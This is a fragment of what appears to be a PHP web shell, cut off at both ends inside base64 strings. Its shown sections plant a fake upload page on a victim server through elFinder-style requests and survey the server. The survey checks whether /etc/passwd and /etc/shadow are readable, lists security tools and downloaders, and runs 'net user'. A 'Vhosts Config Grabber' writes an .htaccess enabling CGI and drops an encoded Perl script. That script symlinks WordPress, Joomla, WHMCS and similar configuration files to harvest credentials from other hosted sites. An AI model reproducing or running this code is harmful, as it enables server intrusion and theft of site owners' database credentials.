bWV0aG9kLiIgIik7DQpmd3JpdGUoJGxvZyAsIi09LT0tPS09LT0tPS0iLiIgIik7DQo/Pg0KPCFET0NUWVBFIEhUTUw+DQo8aHRtbD4NCiAgICA8aGVhZD4NCiAgICAgICAgPHRpdGxlPlVwbG9hZCBZb3VyIEltYWdlPC90aXRsZT4NCiAgICA8L2hlYWQ+DQogICAgPGJvZHk+DQogICAgICAgIDxmb3JtIGFjdGlvbj0icHJvY2Nlc3NfY2hlY2sucGhwIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiPg0KICAgICAgICAgICAgPHA+U2VsZWN0IGltYWdlIHRvIHVwbG9hZDo8L3A+DQogICAgICAgICAgICA8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZVRvVXBsb2FkIiBpZD0iZmlsZVRvVXBsb2FkIj4NCiAgICAgICAgICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJVcGxvYWQgRmlsZSIgbmFtZT0ic3VibWl0Ij4NCiAgICAgICAgPC9mb3JtPg0KICAgIDwvYm9keT4NCjwvaHRtbD4=";
        $decode_isi = base64_decode($isi_nama_doang);
        $encode = base64_encode($global);
        $ss = fopen($global,"w");
        fputs($ss, $decode_isi);
        echo "[+] <a href='$korban' target='_blank'>$korban</a><br>";
        echo "Done Fake Arbitrary Upload Honeypot ada di => ".$dir." [ upload.php ] berhasil di tanam tinggal nunggu siapa kejebak wkwk<br>";
        $url_mkfile = "$korban?cmd=mkfile&name=$global&target=l1_Lw";
        $post1 = array(
            "target" => "l1_$encode",
            "content" => "$decode_isi",);
        $post2 = array( "upload[]" => "@$global",);
        $output_mkfile = ngirim("$korban", $post1);
          $upload_ah = ngirim("$korban?cmd=upload", $post2);
          }
        }
    }
elseif(isset($_GET['do']) && ($_GET['do'] == 'reverse_ip')){
    ?>
  <center>
    <div id="sitelist">
      <a onClick="window.open('https://hackertarget.com/reverse-ip-lookup/','POPUP','width=900 0,height=500,scrollbars=10');return false;" href="https://hackertarget.com/reverse-ip-lookup/">
        <td><font color=lime>> REVERSE IP <</font>
      </a>
      </td>
  </center>
  </div>
  <?
    }
elseif($_GET['do'] == 'infosec') {
echo '<table><th><h3><u>Server security information</u></h3></th><td><div class=content>';
    function showSecParam($n, $v) {
        $v = trim($v);
        if($v) {
            echo '<span>'.$n.': </span>';
            if(strpos($v, "
") === false)
                echo $v. '<br><br>';
            else
                echo '<pre class=ml1>'.$v.'</pre>';
        }
    }
    
    showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
    showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
    showSecParam('Open base dir', @ini_get('open_basedir'));
    showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
    showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
    showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
    $temp=array();
    if(function_exists('mysql_get_client_info'))
        $temp[] = "MySql (".mysql_get_client_info().")";
    if(function_exists('mssql_connect'))
        $temp[] = "MSSQL";
    if(function_exists('pg_connect'))
        $temp[] = "PostgreSQL";
    if(function_exists('oci_connect'))
        $temp[] = "Oracle";
    showSecParam('Supported databases', implode(', ', $temp));
    
    if( $GLOBALS['os'] == 'nix' ) {
        $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
        $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
        $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
        showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g('FilesTools', '/etc/', 'passwd')'>[view]</a>":'no');
        showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g('FilesTools', 'etc', 'shadow')'>[view]</a>":'no');
        showSecParam('OS version', @file_get_contents('/proc/version'));
        showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
        if(!$GLOBALS['safe_mode']) {
            echo '<br>';
            $temp=array();
            foreach ($userful as $item)
                if(which($item)){$temp[]=$item;}
            showSecParam('Userful', implode(', ',$temp));
            $temp=array();
            foreach ($danger as $item)
                if(which($item)){$temp[]=$item;}
            showSecParam('Danger', implode(', ',$temp));
            $temp=array();
            foreach ($downloaders as $item) 
                if(which($item)){$temp[]=$item;}
            showSecParam('Downloaders', implode(', ',$temp));
            echo '<br/>';
            showSecParam('Hosts', @file_get_contents('/etc/hosts'));
            showSecParam('HDD space', exe('df -h'));
            showSecParam('Mount options', @file_get_contents('/etc/fstab'));
        }
    } else {
        showSecParam('OS Version',exe('ver')); 
        showSecParam('Account Settings',exe('net accounts')); 
        showSecParam('User Accounts',exe('net user'));
    }
    echo '</div></td></table>';
}
elseif($_GET['do'] == 'xaivhost') {
    ?>
    <center>
        <h3>Vhosts Config Grabber</h3>
        <td><form method='post'>
                <div align='center'>
                    <input type='submit' name='elgass' value='Click Here'>
                </div></form></td></center>
<?php
if (isset($_POST['elgass'])) {
@mkdir('xaivhost', 0755);
@chdir('xaivhost');
        $elesem = ".htaccess";
        $elakab = "$elesem";
        $filhat = fopen ($elakab , 'w') or die ("Can't Write htaccess !");
        $htcont = "Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .cin
AddHandler cgi-script .cin
AddHandler cgi-script .cin";   
        fwrite($filhat,$htcont ) ;
        fclose($filhat);
$xaivhost = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxubiI7DQpwcmludCc8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+DQo8aHRtbCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+DQoNCjxoZWFkPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1MYW5ndWFnZSIgY29udGVudD0iZW4tdXMiIC8+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCIgLz4NCjx0aXRsZT4uOlByaXY4IHZob3N0cyBDb25maWcgR3JhYmJlciB2MC4xOi48L3RpdGxlPg0KPHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCi5uZXdTdHlsZTEgew0KIGZvbnQtZmFtaWx5OiB1YnVudHU7DQogZm9udC1zaXplOiB4LWxhcmdlOw0KIGNvbG9yOiB3aGl0ZTsNCiBiYWNrZ3JvdW5kLWNvbG9yOiBibGFjazsNCiB0ZXh0LWFsaWduOiBjZW50ZXI7DQp9DQo8L3N0eWxlPg0KPC9oZWFkPg0KJzsNCg0KDQpwcmludCAnDQo8Ym9keSBjbGFzcz0ibmV3U3R5bGUxIj4NCjxwPi46IENvZGVkIGJ5IEZhbGxhZyBHYXNzcmluaSBSZWNvZGVkIEJ5IGVYZVVzZXIgOi48L3A+DQo8cD5rcmVvbnJpbnRvQGdtYWlsLmNvbTwvcD4NCjxwPmh0dHA6Ly9mYi5jb20vcmludG8yMjM0PC9wPic7DQpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOw0KZm9yZWFjaChzb3J0IHJlYWRkaXIgJGRpcikgew0KICAgIG15ICRpc0RpciA9IDA7DQogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsNCiRzaXRlc3MgPSAkXzsNCg0KDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atb3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2UudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2VzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NhbGUvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNhbGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLmluYy5waHAnLCRzaXRlc3MuJy1hbWVtYmVyMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXJzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictbWVtYmVycy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW1zLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictNC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dwL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV1Avd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ldy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLW5ldy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9nL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9ncy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLWJsb2dzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1ob21lLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Byb3RhbC93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3Mtc2l0ZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYWluL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy90ZXN0L3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtdGVzdC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJjYWRlL2Z1bmN0aW9ucy9kYmNsYXNzLnBocCcsJHNpdGVzcy4nLWlicHJvYXJjYWRlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2pvb21sYS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb28vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb28udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY21zL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLWNtcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1tYWluLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtaG9tZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92Yi9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmJ+Y29uZmlnLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiMy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIzfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jYy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIxfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9pbmNsdWRlcy9jbGFzc19jb3JlLnBocCcsJHNpdGVzcy4nLXZibHV0dGlufmNsYXNzX2NvcmUucGhwLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAxLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobTE1LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tY2VudHJhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0td2htY3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htL1dITUNTL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLVdITUNTLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htYy1XSE0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS13aG0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNwYW5lbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXBhbmVsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VibWl0dGlja2V0LnBocCcsJHNpdGVzcy4nLXdobWNzMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5nLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYW5hZ2UvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbWFuYWdlLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW15c2hvcC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictemVuY2FydC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXplbmNhcnQudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC1aQ3Nob3AudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc21mL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZjIudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW1zL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bXMudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2